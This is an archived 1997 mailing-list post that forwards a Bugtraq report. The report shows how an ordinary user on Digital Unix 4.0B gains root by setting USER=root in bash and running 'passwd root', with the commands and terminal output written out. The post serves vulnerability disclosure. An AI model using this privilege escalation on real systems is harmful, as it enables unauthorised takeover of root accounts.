[H-GEN] [mmokrejs at PRFDEC.NATUR.CUNI.CZ: Re: SunOS exploit. & DigitalUnix]
BRENTON BILLS
b.bills at student.qut.edu.au
Tue May 20 20:06:40 EDT 1997
On Tue, 20 May 1997, Martin Pool wrote:
> Doubtless the people here who need to know already do, so this is
> presented purely for your entertainment.
>
> ------- Start of forwarded message -------
> Date: Tue, 20 May 1997 10:17:29 +0200
> From: Martin Mokrejs <mmokrejs at PRFDEC.NATUR.CUNI.CZ>
> Subject: Re: SunOS exploit. & DigitalUnix
> To: BUGTRAQ at NETSPACE.ORG
>
> This also works on Digital Unix 4.0B :-(
>
> login as generic user, than run bash,
>
> bash-2.00$ export USER="root"
> bash-2.00$ passwd root
> Last successful password change for root: Sun May 4 16:49:07 1997
> Last unsuccessful password change for root: NEVER
>
> New password:
> Re-enter new password:
> bash-2.00$
>
> I succesfully modified root's password :-( Even we have C2 security
> installed :-(
>
> I suggest - disable bash !!!
>
I am not game to see if it works on droid.
I would be shot and then cut into little pieces. ;)
_____________________________________________________________________
Brenton Bills, 2nd Year Bach Infotech at Queensland Uni Of Technology
Majoring in Software Engineering / Computer Science.
b.bills at student.qut.edu.au.<------------------>n1868209 at fit.qut.edu.au
----------------------- HUMBUG General List --------------------------------
echo "unsubscribe general" | mail majordomo at humbug.org.au # To Unsubscribe
More information about the General
mailing list